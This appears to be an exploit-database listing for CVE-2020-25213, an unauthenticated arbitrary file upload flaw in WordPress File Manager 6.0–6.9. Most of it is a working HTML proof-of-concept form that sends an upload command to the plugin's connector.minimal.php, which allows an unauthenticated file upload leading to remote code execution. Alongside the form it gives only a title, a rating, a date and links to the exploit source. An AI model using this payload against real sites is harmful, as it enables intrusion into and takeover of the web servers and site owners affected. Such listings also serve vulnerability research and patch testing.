Exploit for File Manager 6.0-6.9 - Unauthenticated Arbitrary File Upload leading to RCE CVE-2020-25213

Name: Exploit for File Manager 6.0-6.9 - Unauthenticated Arbitrary File Upload leading to RCE CVE-2020-25213
Rating: 5 (185 reviews)

2020-09-01 | CVSS 7.5

## https://sploitus.com/exploit?id=WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9
https://ypcs.fi/misc/code/pocs/2020-wp-file-manager-v67.py

<html>
<body>
  <form method="POST" enctype="multipart/form-data" action="https://example.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php">
    <input type="hidden" name="cmd" value="upload"/>
    <input type="hidden" name="target" value="l1_Lw"/>
    <input type="file" name="upload[]"/><br/><br/>
    <input type="submit" value="Upload"/>
  </form>
</body>